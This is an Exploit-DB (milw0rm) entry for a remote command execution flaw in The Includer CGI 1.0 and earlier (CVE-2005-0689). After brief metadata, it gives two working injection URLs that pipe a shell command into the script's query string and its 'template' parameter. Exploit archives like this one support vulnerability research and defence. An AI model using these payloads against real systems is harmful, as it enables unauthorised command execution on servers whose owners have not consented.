The Includer CGI <= 1.0 - Remote Command Execution

EDB-ID: 862 CVE: 2005-0689 OSVDB-ID: 14624
Verified: Author: Francisco Alisson Published: 2005-03-07
Download Exploit: Source Raw Download Vulnerable App: N/A
Remote Command Execution on:

Example I.: www.host-vulnerable.com/includer.cgi?|id|
Example II.: www.host-vulnerable.com/includer.cgi?template=|id|

# milw0rm.com [2005-03-07]